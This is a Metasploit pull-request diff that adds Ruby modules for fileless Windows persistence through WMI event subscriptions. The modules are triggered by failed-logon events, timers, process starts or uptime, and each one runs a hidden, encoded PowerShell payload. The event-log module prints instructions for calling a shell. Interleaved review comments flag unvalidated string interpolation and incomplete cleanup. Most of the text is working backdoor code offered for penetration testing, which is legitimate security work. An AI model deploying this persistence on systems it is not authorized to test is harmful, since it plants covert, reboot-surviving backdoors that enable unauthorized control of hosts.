datastore['PROCESS_TRIGGER'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - 
HEREDOC - end - - def subscription_waitfor - command = build_payload - word = datastore['WAITFOR_TRIGGER'] - class_name = datastore['CLASSNAME'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND Targetinstance.Name = 'waitfor.exe'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"cmd.exe /C waitfor.exe #{word} && #{command} && taskkill /F /IM cmd.exe\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - $Filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'} - $Consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1} - Start-Process -FilePath waitfor.exe #{word} -NoNewWindow - HEREDOC - end - - def log_file - host = session.session_host - filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") - logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence', - Rex::FileUtils.clean_path(host + filenameinfo)) - ::FileUtils.mkdir_p(logs) - logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc') - end - - def 
remove_persistence - name_class = datastore['CLASSNAME'] - clean_rc = log_file - if datastore['PERSISTENCE_METHOD'] == "WAITFOR" - clean_up_rc = "" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" - else - clean_up_rc = "" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" - end - file_local_write(clean_rc, clean_up_rc) - print_status("Clean up Meterpreter RC file: #{clean_rc}") - end -end 
diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_event_log.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_event_log.rb
new file mode 100644
index 0000000000000..93e7ca8d6207b
--- /dev/null
+++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_event_log.rb
@@ -0,0 +1,129 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Msf::Post::Windows::Powershell
+ include Msf::Exploit::Powershell
+ include Post::Windows::Priv
+ include Msf::Post::File
+ include Msf::Exploit::Local::Persistence
+ include Msf::Exploit::Deprecated
+ moved_from 'exploits/windows/local/wmi_persistence'
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'WMI Event Subscription Event Log Persistence',
+ 'Description' => %q{
+ This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter
+ that will query the event log for an EVENT_ID_TRIGGER
+ (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing
+ must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon
+ /failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.
+
+ Additionally a custom command can be specified to run once the trigger is
+ activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
+ high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.
+ },
+ 'Author' => [
+ 'Nick Tyrer <@NickTyrer>', # original module
+ 'h00die' # docs, persistence mixin, pshell cleanup
+ ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'SessionTypes' => ['meterpreter'],
+ 'Targets' => [['Windows', {}]],
+ 'DisclosureDate' => '2017-06-06',
+ 'DefaultTarget' => 0,
+ 'References' => [
+ ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],
+ ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'],
+ ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION]
+ ],
+ 'Notes' => {
+ 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+ }
+ )
+ )
+
+ register_options([
+ OptInt.new('EVENT_ID_TRIGGER',
+ [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),
+ OptString.new('USERNAME_TRIGGER',
+ [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]),
+ OptString.new('CLASSNAME',
+ [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
+ ])
+
+ register_advanced_options(
+ [
+ OptString.new('CUSTOM_PS_COMMAND',
+ [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]),
+ ]
+ )
+ end
+
+ def check
+ print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+ return CheckCode::Safe('This module requires powershell to run') unless have_powershell?
+
+ return CheckCode::Safe('This module requires admin privs to run') unless is_admin?
+
+ return CheckCode::Safe('This module cannot run as System') if is_system?
+
+ return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity?
+
+ CheckCode::Appears('Likely exploitable')
+ end
+
+ def install_persistence
+ host = session.session_host
+ print_status('Installing Persistence...')
+
+ psh_exec(subscription_event)
+ print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\#{host}\\\\C$ -U #{datastore['USERNAME_TRIGGER']} \""
+ print_good ' or'
+ print_good 'use auxiliary/scanner/smb/smb_login'
+ print_good " run SMBUser=#{datastore['USERNAME_TRIGGER']} SMBPass= RHOSTS=#{host}"
+ # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell
+ # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+ name_class = datastore['CLASSNAME']
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ end
+
+ def build_payload
+ if datastore['CUSTOM_PS_COMMAND']
+ script_in = datastore['CUSTOM_PS_COMMAND']
+ compressed_script = compress_script(script_in)
+ encoded_script = encode_script(compressed_script)
+ generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script)
+ else
+ cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+ end
+ end
+
+ def subscription_event
+ command = build_payload
+ event_id = datastore['EVENT_ID_TRIGGER']
+ username = datastore['USERNAME_TRIGGER']
+ class_name = datastore['CLASSNAME']
+ <<-HEREDOC
+ $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'}
+ $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+ $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+ HEREDOC
+ end
+end
diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_interval.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_interval.rb
new file mode 100644
index 0000000000000..a09ec2604efc6
--- /dev/null
+++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_interval.rb
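Review bot: `CLASSNAME` and `USERNAME_TRIGGER` are interpolated unvalidated into quoted PowerShell and WQL strings in `subscription_event` (`Name = \"#{class_name}\"`, `Like '%#{username}%'`) and again into the cleanup lines appended in `install_persistence` (`Name='#{name_class}'`). A value containing a quote or backtick produces a malformed script, and because creation and cleanup quote the name differently the generated RC file may no longer match the objects it is meant to delete, leaving the subscription on the host after the engagement. I would reject such values before `psh_exec`, e.g. `fail_with(Failure::BadConfig, 'CLASSNAME may only contain letters, digits and underscore') unless datastore['CLASSNAME'].match?(/\A\w+\z/)`, with an equivalent check for `USERNAME_TRIGGER`. The same interpolation of `CLASSNAME` appears in the interval module added by this commit.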
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Msf::Post::Windows::Powershell
+ include Msf::Exploit::Powershell
+ include Post::Windows::Priv
+ include Msf::Post::File
+ include Msf::Exploit::Local::Persistence
+ include Msf::Exploit::Deprecated
+ moved_from 'exploits/windows/local/wmi_persistence'
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'WMI Event Subscription Interval Persistence',
+ 'Description' => %q{
+ This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter
+ that triggers the payload after the specified CALLBACK_INTERVAL.
+
+ If the persistence is not installed, it will keep triggering payloads to spawn.
+
+ Additionally a custom command can be specified to run once the trigger is
+ activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
+ high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.
+ },
+ 'Author' => [
+ 'Nick Tyrer <@NickTyrer>', # original module
+ 'h00die' # docs, persistence mixin, pshell cleanup
+ ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'SessionTypes' => ['meterpreter'],
+ 'Targets' => [['Windows', {}]],
+ 'DisclosureDate' => '2017-06-06',
+ 'DefaultTarget' => 0,
+ 'References' => [
+ ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],
+ ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'],
+ ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION]
+ ],
+ 'Notes' => {
+ 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+ }
+ )
+ )
+
+ register_options([
+ OptInt.new('CALLBACK_INTERVAL',
+ [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1_800_000 ]), # 30 minutes
+ OptString.new('CLASSNAME',
+ [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
+ ])
+
+ register_advanced_options(
+ [
+ OptString.new('CUSTOM_PS_COMMAND',
+ [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]),
+ ]
+ )
+ end
+
+ def check
+ print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+ return CheckCode::Safe('This module requires powershell to run') unless have_powershell?
+
+ return CheckCode::Safe('This module requires admin privs to run') unless is_admin?
+
+ return CheckCode::Safe('This module cannot run as System') if is_system?
+
+ return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity?
+
+ CheckCode::Appears('Likely exploitable')
+ end
+
+ def format_duration(ms)
+ total_seconds = ms / 1000
+ hours = total_seconds / 3600
+ minutes = (total_seconds % 3600) / 60
+ seconds = total_seconds % 60
+
+ parts = []
+ parts << "#{hours}h" if hours > 0
+ parts << "#{minutes}m" if minutes > 0
+ parts << "#{seconds}s" if seconds > 0 || parts.empty?
+
+ parts.join(' ')
+ end
+
+ def install_persistence
+ print_status('Installing Persistence...')
+ psh_exec(subscription_interval)
+ print_good "Persistence installed! Callback should be in: #{format_duration(datastore['CALLBACK_INTERVAL'])}"
+ # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell
+ # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+ name_class = datastore['CLASSNAME']
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ end
+
+ def build_payload
+ if datastore['CUSTOM_PS_COMMAND']
+ script_in = datastore['CUSTOM_PS_COMMAND']
+ compressed_script = compress_script(script_in)
+ encoded_script = encode_script(compressed_script)
+ generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script)
+ else
+ cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+ end
+ end
+
+ def subscription_interval
+ command = build_payload
+ class_name = datastore['CLASSNAME']
+ callback_interval = datastore['CALLBACK_INTERVAL']
+ <<-HEREDOC
+ $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
+ $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'}
+ $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+ $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+ HEREDOC
+ end
+end
diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_process.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_process.rb
new file mode 100644
index 0000000000000..a6f52f2adbb6c
--- /dev/null
+++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_process.rb
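Review bot: The cleanup lines appended in `install_persistence` delete the `__EventFilter`, `CommandLineEventConsumer` and `__FilterToConsumerBinding`, but not the `__IntervalTimerInstruction` that `subscription_interval` creates in `root/cimv2` with `TimerID = \"Trigger\"`, so the timer stays registered on the host after the RC file has run. A fourth cleanup line in the same form as the existing three, querying the `root\\cimv2` namespace with `SELECT * FROM __IntervalTimerInstruction WHERE TimerID='Trigger'` and deleting the result, would close that gap. Because the timer ID is a fixed string rather than derived from `CLASSNAME`, two installs with different class names presumably share one timer, which the module documentation should mention. `CALLBACK_INTERVAL` is also cast to `[UInt32]` without a range check; `fail_with(Failure::BadConfig, 'CALLBACK_INTERVAL must be positive') unless datastore['CALLBACK_INTERVAL'].positive?` would catch zero and negative values before anything is written to the target.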
@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Msf::Post::Windows::Powershell
+ include Msf::Exploit::Powershell
+ include Post::Windows::Priv
+ include Msf::Post::File
+ include Msf::Exploit::Local::Persistence
+ include Msf::Exploit::Deprecated
+ moved_from 'exploits/windows/local/wmi_persistence'
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'WMI Event Subscription Process Persistence',
+ 'Description' => %q{
+ This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter
+ that triggers the payload when the specified process is started.
+
+ Additionally a custom command can be specified to run once the trigger is
+ activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
+ high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.
+ },
+ 'Author' => [
+ 'Nick Tyrer <@NickTyrer>', # original module
+ 'h00die' # docs, persistence mixin, pshell cleanup
+ ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'SessionTypes' => ['meterpreter'],
+ 'Targets' => [['Windows', {}]],
+ 'DisclosureDate' => '2017-06-06',
+ 'DefaultTarget' => 0,
+ 'References' => [
+ ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],
+ ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'],
+ ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION]
+ ],
+ 'Notes' => {
+ 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+ }
+ )
+ )
+
+ register_options([
+ OptString.new('PROCESS_TRIGGER',
+ [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]),
+ OptString.new('CLASSNAME',
+ [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
+ ])
+
+ register_advanced_options(
+ [
+ OptString.new('CUSTOM_PS_COMMAND',
+ [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]),
+ ]
+ )
+ end
+
+ def check
+ print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+ return CheckCode::Safe('This module requires powershell to run') unless have_powershell?
+
+ return CheckCode::Safe('This module requires admin privs to run') unless is_admin?
+
+ return CheckCode::Safe('This module cannot run as System') if is_system?
+
+ return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity?
+
+ CheckCode::Appears('Likely exploitable')
+ end
+
+ def install_persistence
+ psh_exec(subscription_process)
+ print_good 'Persistence installed!'
+ # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell
+ # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+ name_class = datastore['CLASSNAME']
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ end
+
+ def build_payload
+ if datastore['CUSTOM_PS_COMMAND']
+ script_in = datastore['CUSTOM_PS_COMMAND']
+ compressed_script = compress_script(script_in)
+ encoded_script = encode_script(compressed_script)
+ generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script)
+ else
+ cmd_psh_payload(payload.encoded, 
payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+ end
+ end
+
+ def subscription_process
+ command = build_payload
+ class_name = datastore['CLASSNAME']
+ process_name = datastore['PROCESS_TRIGGER']
+ <<-HEREDOC
+ $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'}
+ $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+ $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+ HEREDOC
+ end
+end
diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_uptime.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_uptime.rb
new file mode 100644
index 0000000000000..c5a78a1fba847
--- /dev/null
+++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_uptime.rb
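Review bot: In `install_persistence` of wmi_event_subscription_process.rb the three cleanup commands are appended to `@clean_up_rc` only after `psh_exec(subscription_process)` has returned, and `CLASSNAME` is interpolated into the WQL and PowerShell strings without any validation. If the script stops partway, or the class name contains a quote character, the generated cleanup no longer matches what was created and the subscription objects can be left behind on the host under test. I would move the `@clean_up_rc <<` lines above the `psh_exec` call and reject unexpected names first, e.g. `fail_with(Failure::BadConfig, 'CLASSNAME must be alphanumeric') unless datastore['CLASSNAME'].match?(/\A\w+\z/)`. The same pattern appears in the interval module before this hunk and in the uptime and waitfor modules after it. The commented-out wmic lines also use `name_class` before it is assigned and are better deleted than kept as dead code.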
@@ -0,0 +1,152 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Msf::Post::Windows::Powershell
+ include Msf::Exploit::Powershell
+ include Post::Windows::Priv
+ include Msf::Post::File
+ include Msf::Exploit::Local::Persistence
+ include Msf::Exploit::Deprecated
+ moved_from 'exploits/windows/local/wmi_persistence'
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'WMI Event Subscription Logon Timer Persistence',
+ 'Description' => %q{
+ This module will create a permanent WMI event subscription to achieve file-less persistence using event filter that
+ will trigger the payload after the system has a certain uptime. Payloads will trigger every minute until the set end time.
+
+ Additionally a custom command can be specified to run once the trigger is
+ activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
+ high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.
+ },
+ 'Author' => [
+ 'Nick Tyrer <@NickTyrer>', # original module
+ 'h00die' # docs, persistence mixin, pshell cleanup
+ ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'SessionTypes' => ['meterpreter'],
+ 'Targets' => [['Windows', {}]],
+ 'DisclosureDate' => '2017-06-06',
+ 'DefaultTarget' => 0,
+ 'References' => [
+ ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],
+ ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'],
+ ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION]
+ ],
+ 'Notes' => {
+ 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+ }
+ )
+ )
+
+ register_options([
+ OptString.new('CLASSNAME',
+ [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]),
+ OptInt.new('SYSTEM_UPTIME_START', [true, 'System uptime to start the trigger (In seconds). (Default: 240).', 240 ]), # 4min
+ OptInt.new('SYSTEM_UPTIME_END', [true, 'System uptime to end the trigger (In seconds). (Default: 325).', 325 ]), # 5min 25sec
+ ])
+
+ register_advanced_options(
+ [
